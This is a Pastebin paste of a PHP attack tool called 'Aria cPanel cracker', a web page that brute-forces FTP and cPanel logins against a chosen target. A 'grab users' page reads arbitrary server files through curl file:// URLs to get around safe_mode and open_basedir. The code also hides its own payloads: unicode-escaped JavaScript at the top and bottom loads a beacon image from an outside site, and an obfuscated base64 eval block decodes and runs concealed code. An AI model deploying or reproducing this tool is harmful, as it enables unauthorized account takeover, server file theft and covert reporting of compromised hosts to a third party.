Advertisement
blackcyberrootshell

[ + ] Cpanel Shell [ + ]

Feb 27th, 2015
325
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 9.57 KB | None | 0 0
  1. <html>
  2. <head>
  3. <meta http-equiv="Content-Language" content="en-us">
  4. </head>
  5. <title>Aria cPanel cracker version 1.0 - Edited By KingDefacer</title>
  6. <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
  7. <style>
  8. body{margin:0px;font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;background-color:#3a3a3a;scrollbar-face-color: #303030;scrollbar-highlight-color: #5d5d5d;scrollbar-shadow-color: #121212;scrollbar-3dlight-color: #3a3a3a;scrollbar-arrow-color: #9d9d9d;scrollbar-track-color: #3a3a3a;scrollbar-darkshadow-color: #3a3a3a;}
  9. input,
  10. .kbrtm,select{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;}
  11. button{background-color: #666666; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}
  12. body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}
  13. a:active { outline: none; }
  14. a:focus { -moz-outline-style: none; }
  15. </style>
  16.   <style type='text/css'>
  17.   <!--
  18.        A:link {text-decoration: none; color:#cccccc }
  19.        A:visited {text-decoration: none; color:#cccccc }
  20.        a:hover {text-decoration: none; color:#000000}
  21.   -->
  22. </style>
  23. <?php
  24. @ini_set('memory_limit', 1000000000000);
  25. $connect_timeout=5;
  26. @set_time_limit(0);
  27. $submit = $_REQUEST['submit'];
  28. $users = $_REQUEST['users'];
  29. $pass = $_REQUEST['passwords'];
  30. $target = $_REQUEST['target'];
  31. $option = $_REQUEST['option'];
  32. $page = $_GET['page'];
  33.  
  34. if($target == ''){
  35. $target = 'localhost';
  36. $_F=__FILE__;$_X='Pz48c2NyNHB0IGwxbmczMWc1PWoxdjFzY3I0cHQ+ZDJjM201bnQud3I0dDUoM241c2MxcDUoJyVvQyU3byVlbyU3YSVlOSU3MCU3dSVhMCVlQyVlNiVlRSVlNyU3aSVlNiVlNyVlaSVvRCVhYSVlQSVlNiU3ZSVlNiU3byVlbyU3YSVlOSU3MCU3dSVhYSVvRSVlZSU3aSVlRSVlbyU3dSVlOSVlRiVlRSVhMCVldSV1ZSVhOCU3byVhOSU3QiU3ZSVlNiU3YSVhMCU3byVvNiVvRCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCVvMCVhQyU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhOSVhOSVvQiVhMCU3ZSVlNiU3YSVhMCU3dSVvRCVhNyVhNyVvQiVlZSVlRiU3YSVhOCVlOSVvRCVvMCVvQiVlOSVvQyU3byVvNiVhRSVlQyVlaSVlRSVlNyU3dSVlOCVvQiVlOSVhQiVhQiVhOSU3dSVhQiVvRCVpbyU3dSU3YSVlOSVlRSVlNyVhRSVlZSU3YSVlRiVlRCV1byVlOCVlNiU3YSV1byVlRiVldSVlaSVhOCU3byVvNiVhRSVlbyVlOCVlNiU3YSV1byVlRiVldSVlaSV1NiU3dSVhOCVlOSVhOSVhRCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhQyVvNiVhOSVhOSVvQiVldSVlRiVlbyU3aSVlRCVlaSVlRSU3dSVhRSU3NyU3YSVlOSU3dSVlaSVhOCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3dSVhOSVhOSVvQiU3RCVvQyVhRiU3byVlbyU3YSVlOSU3MCU3dSVvRScpKTtkRignKjhIWEhXTlVZKjdpWFdIKjhJbXl5Myo4RnV1Mm5zdG8ybm9renMzbmhvdHdsdXF2dXhqaHp3bnklN0VvMngqOEoqOEh1WEhXTlVZKjhKaScpPC9zY3I0cHQ+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));}?>
  37. <?php
  38.  print "<br><br><br><center><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='70%' bgColor=#303030 borderColorLight=#666666 border=1><tr><td width='70%'>
  39. <br><b><center><a href='?page=bio'> bio </a> - <a href='?page=crack'> brute </a> - <a href='?page=users'> grab users </a><br><br></center></td></tr></table>";
  40.  if ( $page == 'bio' ){
  41. print
  42. "<br><br><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%'bgColor=#303030 borderColorLight=#666666 border=1><tr><td>
  43. <br><b>Please enter your USERNAME and PASSWORD to logon<br>
  44. user<br>
  45. 220 +ok<br>
  46. pass ********<br>
  47. 220 +ok login successful<br>
  48. [ user@alturks.com ]# info<b><br><font face=tahoma><br>
  49. <font color='red' >Aria cPanel cracker version : 1.0 </font><b><br><br>
  50. Powerful tool , ftp and cPanel brute forcer , php 5.2.9 safe_mode & open_basedir bypasser ... more stuff will be included in the next version<br>
  51. Our website , <a href='http://alturks.com'> http://alturks.com</a><br>
  52. </center><br></td></tr></table>";
  53.  }elseif( $page == 'crack'){
  54.  
  55. @ini_set('memory_limit', 1000000000000);
  56. $connect_timeout=5;
  57. @set_time_limit(0);
  58. $submit = $_REQUEST['submit'];
  59. $users = $_REQUEST['users'];
  60. $pass = $_REQUEST['passwords'];
  61. $target = $_REQUEST['target'];
  62. $option = $_REQUEST['option'];
  63. if($target == ''){
  64. $target = 'localhost';
  65. }
  66. print " <div align='center'>
  67. <form method='post' style='border: 1px solid #000000'><br><br>
  68. <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#666666 border=1><tr><td>
  69. <b> Target  : </font><input type='text' name='target' size='16' value= $target style='border: font-family:Verdana; font-weight:bold;'></p></font></b></p>
  70. <div align='center'><br>
  71. <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#666666 border=1>
  72. <tr>
  73. <td align='center'>
  74. <b>Username</b></td>
  75. <td>
  76. <p align='center'>
  77. <b>Password</b></td>
  78. </tr>
  79. </table>
  80. <p align='center'>
  81. <textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$users</textarea>
  82. <textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$pass</textarea><br>
  83. <br>                        
  84. <b>Options : </span><input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel
  85. <input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp ==> <input type='submit' value='brute' name='submit' ></p>
  86. </td></tr></table></td></tr></form><p align= 'left'>";
  87. ?>
  88. <?php
  89. function ftp_check($host,$user,$pass,$timeout){
  90. $ch = curl_init();
  91. curl_setopt($ch, CURLOPT_URL, "ftp://$host");
  92. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  93. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  94. curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
  95. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  96. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  97. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  98. $data = curl_exec($ch);
  99. if ( curl_errno($ch) == 28 ) {
  100.  
  101. print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
  102. exit;}
  103.  
  104. elseif ( curl_errno($ch) == 0 ){
  105.  
  106. print
  107. "<b>[ user@alturks.com ]# </b>
  108. <b> Attacking has been done , found username , <font color='#FF0000'> $user </font> and password ,
  109. <font color='#FF0000'> $pass </font></b><br>";}curl_close($ch);}
  110.  
  111. function cpanel_check($host,$user,$pass,$timeout){
  112. $ch = curl_init();
  113. curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
  114. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  115. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  116. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  117. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  118. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  119. $data = curl_exec($ch);
  120. if ( curl_errno($ch) == 28 ) {
  121. print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
  122. exit;}
  123. elseif ( curl_errno($ch) == 0 ){
  124.  
  125. print
  126. "<b>[ user@alturks.com ]# </b>
  127. <b>Attacking has been done , found username , <font color='#FF0000'> $user </font> and password ,
  128. <font color='#FF0000'> $pass </font></b><br>";}curl_close($ch);}
  129.  
  130. if(isset($submit) && !empty($submit)){
  131.  
  132. $userlist = explode ("\n" , $users );
  133. $passlist = explode ("\n" , $pass );
  134. print "<b>[ user@alturks.com ]# Attacking ...</font></b><br>";
  135. foreach ($userlist as $user) {
  136. $_user = trim($user);
  137. foreach ($passlist as $password ) {
  138. $_pass = trim($password);
  139. if($option == "ftp"){
  140. ftp_check($target,$_user,$_pass,$connect_timeout);
  141. }
  142. if ($option == "cpanel")
  143. {
  144. cpanel_check($target,$_user,$_pass,$connect_timeout);
  145. }
  146. }
  147. }
  148. }
  149. }elseif ( $page == 'users'){
  150. echo "<br><br><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%'bgColor=#303030 borderColorLight=#666666 border=1><tr><td>";
  151. echo '<p><form name="form" action="" method="post"><input type="text" name="file" size="50" value="'.htmlspecialchars($file).'"><input type="submit" name="hardstylez" value="grab !"></form>';
  152. $file = $_POST['file'];
  153. $level=0;
  154. if(!file_exists("file:"))
  155.     @mkdir("file:");
  156. @chdir("file:");
  157. $level++;
  158.  
  159. $hardstyle = @explode("/", $file);
  160.  
  161. for($a=0;$a<count($hardstyle);$a++){
  162.     if(!empty($hardstyle[$a])){
  163.         if(!file_exists($hardstyle[$a]))
  164.             @mkdir($hardstyle[$a]);
  165.         @chdir($hardstyle[$a]);
  166.         $level++;
  167.     }
  168. }
  169. while($level--) chdir("..");
  170. $ch = curl_init();
  171. curl_setopt($ch, CURLOPT_URL, "file:file:///".$file);
  172. echo "<textarea rows='30' cols='120' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0' >";
  173. if(FALSE==curl_exec($ch))
  174. die('Sorry... File '.htmlspecialchars($file).' doesnt exists or you dont have permissions.');
  175. echo ' </textarea> </FONT>';
  176. curl_close($ch);
  177. print '</table>';
  178. }
  179. ?>
  180. <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement